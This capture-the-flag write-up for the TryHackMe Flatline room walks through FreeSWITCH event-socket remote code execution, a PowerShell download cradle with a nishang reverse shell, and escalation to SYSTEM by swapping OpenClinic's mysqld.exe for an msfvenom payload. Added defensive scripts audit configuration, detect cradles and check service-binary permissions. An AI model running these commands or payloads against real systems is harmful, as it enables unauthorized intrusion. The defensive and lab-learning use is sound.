TryHackMe page for this machine => https://tryhackme.com/room/flatline
NOTE: I had to terminate and start the machine multiple times, as the exploit needed for the foothold timed out repeatedly. You may have to do the same.
Enum
rustscan nmap
└─$ rustscan -a 10.10.98.113 -- -A -Pn
Open 10.10.98.113:3389
Open 10.10.98.113:8021
PORT     STATE SERVICE          REASON  VERSION
3389/tcp open  ms-wbt-server    syn-ack Microsoft Terminal Services
| rdp-ntlm-info:
|   Target_Name: WIN-EOM4PK0578N
|   NetBIOS_Domain_Name: WIN-EOM4PK0578N
|   NetBIOS_Computer_Name: WIN-EOM4PK0578N
|   DNS_Domain_Name: WIN-EOM4PK0578N
|   DNS_Computer_Name: WIN-EOM4PK0578N
|   Product_Version: 10.0.17763
|_  System_Time: 2022-11-06T09:40:13+00:00
| ssl-cert: Subject: commonName=WIN-EOM4PK0578N
| Issuer: commonName=WIN-EOM4PK0578N
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-11-05T09:12:21
| Not valid after:  2023-05-07T09:12:21
| MD5:   3090 28ea a18f 37ce f134 275b 8a11 85b7
| SHA-1: 0594 e942 a7b3 ca04 7e4e 625c 6c0b 6903 f089 dde0
| -----BEGIN CERTIFICATE-----
| MIIC4jCCAcqgAwIBAgIQd/ojPAXxV75Ihn2h8kAwfTANBgkqhkiG9w0BAQsFADAa
| MRgwFgYDVQQDEw9XSU4tRU9NNFBLMDU3OE4wHhcNMjIxMTA1MDkxMjIxWhcNMjMw
| NTA3MDkxMjIxWjAaMRgwFgYDVQQDEw9XSU4tRU9NNFBLMDU3OE4wggEiMA0GCSqG
| SIb3DQEBAQUAA4IBDwAwggEKAoIBAQClNnOLEC5U40F8dFZZtmmSj8zVa4Fqd0fU
| 3O+Pf/sDLF/23s4R6LkjvmjZaGNWMAVzlKwOMYJ3umlmLTRJJF0DEnaM79phGLba
| ePPbdRiUjUQFdBK9tyPpYCLB2m+K1z0YJLoXt8br7WSVp7Ho8Sz2E6sBZRM5H6QN
| ptO8j/syFSdLYWusTAp/gEQpVUoiElFcmDfa7rP2gQELHb03EvL9Gz9lPRrrVA3r
| XzEUNuqkG4J70LenFv7AH1j70FL48UStBESKYLaXaruRN8TkVjRWhmrYhC7tMVRB
| h8oVb8bcCvwqsw7VYEy197AdyePV0fkvjfbyrp6tstPMVm4hFM2FAgMBAAGjJDAi
| MBMGA1UdJQQMMAoGCCsGAQUFBwMBMAsGA1UdDwQEAwIEMDANBgkqhkiG9w0BAQsF
| AAOCAQEAfv/F86NeGYpqgaQz5Q+R5FrYkqnZoZBxrlbpG8rB9+hixOjRs6s6skjy
| x0IYovOcSXI3Sy4dh3GRjWn+hv5szbYzb4hKQojzw7CNScJSbTyGh7sJuGv1+hUe
| F6izAORicQkApcLweXv5MyVj1qUrmwWo4DpbG34nIf6W6hpNlW2VdWfCqIfjnEvy
| 3LOWrn++sncxXdBmg24fDNohJJFgvp3ui7VbmYVepe1SmqIql7vKt+qMV2kZv+cg
| SU1pZqYrHwwcpD3Qx6R7oqSVHjulW1eGTC6t+au8Oc6rytgamvbrCIGAwSUVcJLt
| pVkvw++/yMtWLoiiT+RCa2abEwEcPw==
|_-----END CERTIFICATE-----
|_ssl-date: 2022-11-06T09:40:13+00:00; 0s from scanner time.
8021/tcp open  freeswitch-event syn-ack FreeSWITCH mod_event_socket
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 0s, deviation: 0s, median: 0s
Note: The machine keeps blocking ping probes, so use the nmap -Pn flag (skip host discovery) when enumerating the machine!
Port 3389 Enumeration
Let's use some nmap scripts to enumerate the port some more.
└─$ sudo nmap --script="rdp-*" -p 3389 flatline.thm -vv -Pn
PORT     STATE SERVICE       REASON
3389/tcp open  ms-wbt-server syn-ack ttl 127
| rdp-ntlm-info:
|   Target_Name: WIN-EOM4PK0578N
|   NetBIOS_Domain_Name: WIN-EOM4PK0578N
|   NetBIOS_Computer_Name: WIN-EOM4PK0578N
|   DNS_Domain_Name: WIN-EOM4PK0578N
|   DNS_Computer_Name: WIN-EOM4PK0578N
|   Product_Version: 10.0.17763
|_  System_Time: 2022-11-06T09:55:55+00:00
| rdp-enum-encryption:
|   Security layer
|     CredSSP (NLA): SUCCESS
|     CredSSP with Early User Auth: SUCCESS
|_    RDSTLS: SUCCESS
Port 8021 Enumeration
I wanted to see what in the world FreeSWITCH is. From Wikipedia: https://en.wikipedia.org/wiki/FreeSWITCH
**FreeSWITCH** *is free and open-source server software for real-time communication applications, including WebRTC, video, and voice over Internet Protocol (VoIP). It runs on Linux, Windows, macOS, and FreeBSD. FreeSWITCH is used to build private branch exchange (PBX) telecommunication systems, IVR services, videoconferencing with chat and screen sharing, wholesale least-cost routing, Session Border Controller (SBC) and embedded communication appliances.*
Let's look for some vulnerabilities.
└─$ searchsploit freeswitch
------------------------------------------------------------ ---------------------------------
 Exploit Title                                              |  Path
------------------------------------------------------------ ---------------------------------
FreeSWITCH - Event Socket Command Execution (Metasploit)    | multiple/remote/47698.rb
FreeSWITCH 1.10.1 - Command Execution                       | windows/remote/47799.txt
------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
Interesting. Let's try and get RCE without Metasploit.
Foothold
RCE without Metasploit
Using the script present here => https://www.exploit-db.com/exploits/47799
└─$ python3 exploit.py flatline.thm whoami
Authenticated
Content-Type: api/response
Content-Length: 25

win-eom4pk0578n\nekrotic
Looks like it works! Let's try and get a proper shell going on here.
└─$ python3 exploit.py 10.10.7.242 dir
Authenticated
Content-Type: api/response
Content-Length: 2346

 Volume in drive C has no label.
 Volume Serial Number is 84FD-2CC9

 Directory of C:\Program Files\FreeSWITCH

09/11/2021  07:38    <DIR>          .
09/11/2021  07:38    <DIR>          ..
09/11/2021  07:22    <DIR>          cert
09/11/2021  07:22    <DIR>          conf
06/11/2022  10:33    <DIR>          db
09/11/2021  07:18    <DIR>          fonts
20/08/2019  12:08         4,991,488 FreeSwitch.dll
20/08/2019  12:08            26,624 FreeSwitchConsole.exe
20/08/2019  12:19            62,976 fs_cli.exe
09/11/2021  07:18    <DIR>          grammar
---SNIP---
24/03/2018  20:20        15,766,528 v8.dll
24/03/2018  20:05           177,152 v8_libbase.dll
24/03/2018  20:19           134,656 v8_libplatform.dll
03/04/2018  14:01           126,976 zlib.dll
              28 File(s)     96,800,060 bytes
              17 Dir(s)  50,476,666,880 bytes free
Let's try and get the user flag.
└─$ python3 exploit.py 10.10.7.242 "dir C:\\Users\\"
Authenticated
Content-Type: api/response
Content-Length: 405

 Volume in drive C has no label.
 Volume Serial Number is 84FD-2CC9

 Directory of C:\Users

09/11/2021  07:28    <DIR>          .
09/11/2021  07:28    <DIR>          ..
09/11/2021  07:13    <DIR>          Administrator
09/11/2021  07:37    <DIR>          Nekrotic
09/11/2021  07:13    <DIR>          Public
               0 File(s)              0 bytes
               5 Dir(s)  50,457,559,040 bytes free

└─$ python3 exploit.py 10.10.7.242 "dir C:\\Users\\Nekrotic\\Desktop\\"
Authenticated
Content-Type: api/response
Content-Length: 374

 Volume in drive C has no label.
 Volume Serial Number is 84FD-2CC9

 Directory of C:\Users\Nekrotic\Desktop

09/11/2021  07:39    <DIR>          .
09/11/2021  07:39    <DIR>          ..
09/11/2021  07:39                38 root.txt
09/11/2021  07:39                38 user.txt
               2 File(s)             76 bytes
               2 Dir(s)  50,446,991,360 bytes free
Wow. We seem to have found both files. We can read user.txt, but we can't read root.txt. Probably a permissions issue.
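The foothold above works for one reason only: the FreeSWITCH event socket (mod_event_socket, TCP 8021) is reachable from the network and still accepts a password the attacker can guess (the shipped default is ClueCon). As an added example that is not part of the original write-up or of the FreeSWITCH project, here is a small audit script that reads an event_socket.conf.xml and reports the three settings a defender should check: the listen address, the password, and the inbound ACL. The sample configuration embedded below is constructed to mirror the stock file's layout; the 16-character password floor and the set of "loopback" addresses are my own choices.

```python
import xml.etree.ElementTree as ET

# Constructed sample in the shape of FreeSWITCH's stock event_socket.conf.xml:
# as shipped, the socket listens on every interface, uses the default password
# and leaves the inbound ACL commented out.
SAMPLE_CONF = """<configuration name="event_socket.conf" description="Socket Client">
  <settings>
    <param name="nat-map" value="false"/>
    <param name="listen-ip" value="::"/>
    <param name="listen-port" value="8021"/>
    <param name="password" value="ClueCon"/>
    <!--<param name="apply-inbound-acl" value="loopback.auto"/>-->
  </settings>
</configuration>"""

# Constructed hardened counterpart: loopback only, long random secret, ACL on.
HARDENED_CONF = """<configuration name="event_socket.conf" description="Socket Client">
  <settings>
    <param name="nat-map" value="false"/>
    <param name="listen-ip" value="127.0.0.1"/>
    <param name="listen-port" value="8021"/>
    <param name="password" value="replace-me-with-a-long-random-secret"/>
    <param name="apply-inbound-acl" value="loopback.auto"/>
  </settings>
</configuration>"""

DEFAULT_PASSWORD = "ClueCon"          # FreeSWITCH's well-known shipped default
LOOPBACK = {"127.0.0.1", "::1", "localhost"}
MIN_PASSWORD_LEN = 16                 # assumption: local policy floor


def audit_event_socket(xml_text):
    """Return a list of human-readable findings; an empty list means no issue found."""
    root = ET.fromstring(xml_text)
    # ElementTree drops XML comments, so a commented-out ACL simply is not present.
    params = {p.get("name"): p.get("value", "") for p in root.iter("param")}
    findings = []

    listen_ip = params.get("listen-ip", "")
    if listen_ip not in LOOPBACK:
        findings.append(f"listen-ip is '{listen_ip}': event socket reachable from the network")

    password = params.get("password", "")
    if password == DEFAULT_PASSWORD:
        findings.append("password is the shipped default 'ClueCon'")
    elif len(password) < MIN_PASSWORD_LEN:
        findings.append(f"password shorter than {MIN_PASSWORD_LEN} characters")

    if "apply-inbound-acl" not in params:
        findings.append("no apply-inbound-acl: any source address may attempt authentication")

    return findings


if __name__ == "__main__":
    for label, conf in (("stock", SAMPLE_CONF), ("hardened", HARDENED_CONF)):
        print(f"[{label}]")
        for finding in audit_event_socket(conf) or ["no findings"]:
            print("  -", finding)
```

Run it against a copy of the live file (on a Windows install it sits under the conf\autoload_configs directory of the FreeSWITCH folder shown in the listing above) and treat any finding as a reason the socket should not be exposed on 8021 to the network at all.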
Let's get a PowerShell reverse shell to see what's really going on.
Powershell Reverse Shell
- Save this file: https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcpOneLine.ps1
- Delete the second shell comment. As for the first one, uncomment it and replace the IP and PORT with your own.
- Start a Python web server in the folder where you saved the PowerShell script. This is what we will use to serve the script.
- Download and execute the script on the remote machine using the FreeSWITCH exploit.
Running the exploit
┌──(kali㉿kali)-[~/Documents/ctf/thm_easy_flatline]
└─$ python3 exploit.py 10.10.7.242 "powershell IEX (New-Object Net.WebClient).DownloadString('http://10.14.31.78/Invoke-PowerShellTcpOneLine.ps1')"
Run the web server to serve the PowerShell reverse shell
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.7.242 - - [06/Nov/2022 06:20:12] "GET /Invoke-PowerShellTcpOneLine.ps1 HTTP/1.1" 200 -
Reverse Shell listener
┌──(kali㉿kali)-[~]
└─$ ncat -lnvp 4444
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.7.242.
Ncat: Connection from 10.10.7.242:49899.
PS C:\Program Files\FreeSWITCH> gci

    Directory: C:\Program Files\FreeSWITCH

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----       09/11/2021     07:22                cert
d-----       09/11/2021     07:22                conf
d-----       06/11/2022     10:33                db
d-----       09/11/2021     07:18                fonts
d-----       09/11/2021     07:18                grammar
....SNIP....
PS C:\Users\Nekrotic\Desktop> get-acl -path user.txt

    Directory: C:\Users\Nekrotic\Desktop

Path     Owner                    Access
----     -----                    ------
user.txt WIN-EOM4PK0578N\Nekrotic NT AUTHORITY\SYSTEM Allow  FullControl...

PS C:\Users\Nekrotic\Desktop> get-acl -Path root.txt

    Directory: C:\Users\Nekrotic\Desktop

Path     Owner               Access
----     -----               ------
root.txt NT AUTHORITY\SYSTEM NT AUTHORITY\SYSTEM Allow  FullControl...
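From the blue-team side, the two commands that delivered this shell leave a very recognisable trail: with PowerShell Script Block Logging enabled, the `IEX (New-Object Net.WebClient).DownloadString(...)` cradle and the `Net.Sockets.TCPClient` call inside the nishang one-liner both land in the Microsoft-Windows-PowerShell/Operational log as event 4104. The following is an added detection example (mine, not from the write-up or from nishang) that runs three simple rules over the ScriptBlockText of such events. The four sample blocks are constructed, not real captures from the machine; the rule names and the regexes are my own.

```python
import re

# Constructed sample (event_id, ScriptBlockText) pairs in the shape of PowerShell
# Operational event 4104. Blocks 0 and 1 mirror the download cradle and the
# nishang TCP client used in the write-up; 2 is benign; 3 is a plain file fetch.
SAMPLE_BLOCKS = [
    ("4104", "IEX (New-Object Net.WebClient).DownloadString('http://10.14.31.78/Invoke-PowerShellTcpOneLine.ps1')"),
    ("4104", "$client = New-Object System.Net.Sockets.TCPClient('10.14.31.78',4444);$stream = $client.GetStream();"),
    ("4104", "Get-ChildItem C:\\projects\\openclinic | Format-Table Name,LastWriteTime"),
    ("4104", "Invoke-WebRequest -Uri http://10.14.31.78/mysqld.exe -OutFile mysqld.exe"),
]

# Rule names are arbitrary labels for this example; each regex is case-insensitive
# because PowerShell itself is.
RULES = [
    # download-and-execute cradle: IEX/Invoke-Expression fed by a web fetch
    ("download_cradle", re.compile(
        r"\b(?:IEX|Invoke-Expression)\b.*"
        r"\b(?:DownloadString|DownloadData|WebClient|Invoke-RestMethod|IRM|Invoke-WebRequest|IWR)\b",
        re.I)),
    # raw TCP socket from PowerShell: the core of most PowerShell reverse shells
    ("raw_tcp_client", re.compile(r"Net\.Sockets\.TCPClient\b", re.I)),
    # file dropped to disk via a web fetch or BITS
    ("file_download", re.compile(
        r"\b(?:Invoke-WebRequest|IWR|Start-BitsTransfer|certutil)\b.*-OutFile\b", re.I)),
]


def classify(script_text):
    """Return the names of every rule that matches one script block."""
    return [name for name, rx in RULES if rx.search(script_text)]


def scan(blocks):
    """Return [(index, event_id, [rule names])] for each block with at least one hit."""
    hits = []
    for i, (event_id, text) in enumerate(blocks):
        names = classify(text)
        if names:
            hits.append((i, event_id, names))
    return hits


if __name__ == "__main__":
    for idx, event_id, names in scan(SAMPLE_BLOCKS):
        print(f"block {idx} (event {event_id}): {', '.join(names)}")
        print("   ", SAMPLE_BLOCKS[idx][1][:80])
```

In production these rules would be fed from the event log rather than a list, and the `raw_tcp_client` hit is the one worth paging on: an administrator fetching a script over HTTP is common, a PowerShell process opening its own TCP client to an outside address is not.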
Now we can see why we can't read root.txt: it is owned by SYSTEM and only SYSTEM has access. We will need to escalate privileges to be able to read the file.
Privesc
While taking a look around the system, I came across this on the Administrator's desktop:
PS C:\Users\Administrator\Desktop> gci

    Directory: C:\Users\Administrator\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----       08/11/2021     18:24      108048384 FreeSWITCH-1.10.1-Release-x64.msi
-a----       08/11/2021     06:05      413584335 OpenClinicSetup5.194.18_32bit_full_fr_en_pt_es_nl.exe
I am guessing this OpenClinic software is installed. Looking around the system further, we find its installation location at C:\projects\openclinic.
PS C:\projects\openclinic> gci

    Directory: C:\projects\openclinic

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----       09/11/2021     07:29                jdk1.8
d-----       09/11/2021     07:19                mariadb
d-----       09/11/2021     07:30                tomcat8
d-----       09/11/2021     07:29                Uninstall
-a----       06/04/2021     23:14            250 configureCountry.bat
-a----       01/07/2021     18:20            167 configureLanguage.bat
-a----       09/11/2021     07:18         334840 lua5.1.dll
-a----       07/06/2021     16:58          93696 OpenClinicGAlogin.exe
-a----       08/05/2020     12:17          27136 OpenClinicStartServices.exe
-a----       02/05/2021     00:45            316 stopOpenClinicHttp.bat
-a----       09/11/2021     07:18        1389568 uninstall.exe
Let's see what we can do with this.
┌──(kali㉿kali)-[~/Documents/ctf_tools]
└─$ searchsploit openclinic
------------------------------------------------------------ ---------------------------------
 Exploit Title                                              |  Path
------------------------------------------------------------ ---------------------------------
OpenClinic GA 5.194.18 - Local Privilege Escalation         | windows/local/50448.txt
------------------------------------------------------------ ---------------------------------
Details of this exploit here => https://www.exploit-db.com/exploits/50448
According to the instructions we need to replace the mysqld.exe present in the OpenClinic installation with a malicious payload generated by us.
Let's see if we have the permissions to do that.
PS C:\projects\openclinic\mariadb\bin> get-acl -Path .

    Directory: C:\projects\openclinic\mariadb

Path Owner                  Access
---- -----                  ------
bin  BUILTIN\Administrators NT AUTHORITY\SYSTEM Allow  FullControl...

PS C:\projects\openclinic\mariadb\bin> whoami /groups

GROUP INFORMATION
-----------------

Group Name                                                    Type             SID          Attributes
============================================================= ================ ============ ==================================================================
Everyone                                                      Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account and member of Administrators group Well-known group S-1-5-114    Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators                                        Alias            S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
BUILTIN\Users                                                 Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\BATCH                                            Well-known group S-1-5-3      Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                                                 Well-known group S-1-2-1      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users                              Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization                                Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account                                    Well-known group S-1-5-113    Mandatory group, Enabled by default, Enabled group
LOCAL                                                         Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication                              Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level                          Label            S-1-16-12288
Looks like we can: the shell runs as a member of BUILTIN\Administrators at High integrity, and the bin directory is owned by Administrators.
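What the privesc relies on, in general terms, is a service executable that someone other than Administrators and SYSTEM can overwrite; the service then runs whatever was dropped in its place with its own (SYSTEM) token. The usual way to hunt for this on a host is to run `icacls` over every service binary and look for write-capable rights granted to low-privilege principals. As an added example (mine, not from the write-up or the exploit-db entry), here is a parser for `icacls` output that does exactly that check. The two ACLs in the sample are constructed for illustration: the first deliberately grants Modify to Authenticated Users, the second is what a service binary should look like. The set of "low-privilege" principals and of write-capable right codes is my own selection.

```python
import re

# Constructed sample in the shape of `icacls <file>` output (not captured from
# the target). The first ACL is the weak one this check exists to catch.
SAMPLE_ICACLS = r"""C:\projects\openclinic\mariadb\bin\mysqld.exe BUILTIN\Administrators:(I)(F)
                                              NT AUTHORITY\SYSTEM:(I)(F)
                                              BUILTIN\Users:(I)(RX)
                                              NT AUTHORITY\Authenticated Users:(I)(M)
C:\Program Files\FreeSWITCH\FreeSwitchConsole.exe BUILTIN\Administrators:(I)(F)
                                                  NT AUTHORITY\SYSTEM:(I)(F)
                                                  BUILTIN\Users:(I)(RX)

Successfully processed 2 files; Failed processing 0 files
"""

# An ACE as icacls prints it: "[DOMAIN\]principal:(flag)(flag)..." at end of line.
ACE = r"(?P<principal>[^\\:()]+(?:\\[^\\:()]+)?):(?P<rights>(?:\([^)]*\))+)\s*$"
FIRST_LINE = re.compile(r"^(?P<path>\S.*?)\s+" + ACE)   # path followed by first ACE
CONT_LINE = re.compile(r"^\s+" + ACE)                   # indented ACEs for same path

# Principals any local user effectively holds (assumption: this list is my choice).
LOW_PRIV = {"everyone", "builtin\\users",
            "nt authority\\authenticated users", "nt authority\\interactive"}
# icacls right codes that allow changing the file or its ACL.
WRITE_RIGHTS = {"F", "M", "W", "GW", "GA", "WD", "AD", "WA", "WEA", "DE", "WDAC", "WO"}


def parse_icacls(text):
    """Return {path: [(principal, [right codes]), ...]} from icacls output."""
    acls, path = {}, None
    for line in text.splitlines():
        m = FIRST_LINE.match(line)
        if m:
            path = m.group("path")
            acls[path] = []
        else:
            m = CONT_LINE.match(line)
            if not m or path is None:
                continue          # blank line, summary line, or stray text
        # "(I)(RX,W)" -> ["I", "RX", "W"]; inheritance flags stay in the list harmlessly
        codes = [c for grp in re.findall(r"\(([^)]*)\)", m.group("rights"))
                 for c in grp.split(",") if c]
        acls[path].append((m.group("principal"), codes))
    return acls


def writable_by_low_priv(text):
    """Return [(path, principal, 'right,codes')] for every risky ACE."""
    findings = []
    for path, aces in parse_icacls(text).items():
        for principal, codes in aces:
            if principal.lower() in LOW_PRIV:
                bad = sorted(set(codes) & WRITE_RIGHTS)
                if bad:
                    findings.append((path, principal, ",".join(bad)))
    return findings


if __name__ == "__main__":
    for path, principal, rights in writable_by_low_priv(SAMPLE_ICACLS) or []:
        print(f"WRITABLE  {path}  by {principal} ({rights})")
```

To use it on a real host, collect the binary paths with `Get-CimInstance Win32_Service | Select-Object Name, PathName`, run `icacls` on each executable, and feed the combined output to `writable_by_low_priv`; any hit should be fixed by resetting the ACL so that only Administrators and SYSTEM can modify the file.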
Let's begin.
Generate Payload
On our machine.
└─$ msfpc powershell 10.14.31.78 443 cmd reverse stageless exe
 [*] MSFvenom Payload Creator (MSFPC v1.4.5)
 [i]   IP: 10.14.31.78
 [i] PORT: 443
 [i] TYPE: windows (windows/shell_reverse_tcp)
 [i]  CMD: msfvenom -p windows/shell_reverse_tcp -f exe \
  --platform windows -a x86 -e generic/none LHOST=10.14.31.78 LPORT=443 \
  > '/home/kali/Documents/ctf/thm_easy_flatline/windows-shell-stageless-reverse-tcp-443.exe'

 [i] windows shell created: '/home/kali/Documents/ctf/thm_easy_flatline/windows-shell-stageless-reverse-tcp-443.exe'

 [i] MSF handler file: '/home/kali/Documents/ctf/thm_easy_flatline/windows-shell-stageless-reverse-tcp-443-exe.rc'
 [i] Run: msfconsole -q -r '/home/kali/Documents/ctf/thm_easy_flatline/windows-shell-stageless-reverse-tcp-443-exe.rc'
 [?] Quick web server (for file transfer)?: python2 -m SimpleHTTPServer 8080
 [*] Done!

└─$ mv windows-shell-stageless-reverse-tcp-443.exe mysqld.exe
On the server. We will have to restart the computer as per the exploit instructions, so that the service starts our replacement binary.
PS C:\projects\openclinic\mariadb\bin> mv mysqld.exe mysqld.exe.bak
PS C:\projects\openclinic\mariadb\bin> IWR -Uri http://10.14.31.78/mysqld.exe -OutFile mysqld.exe
PS C:\projects\openclinic> Restart-Computer
Now we wait for our reverse shell to activate.
└─$ ncat -lnvp 443
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from 10.10.52.62.
Ncat: Connection from 10.10.52.62:49669.
Microsoft Windows [Version 10.0.17763.737]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system
DONE! Go get that root flag!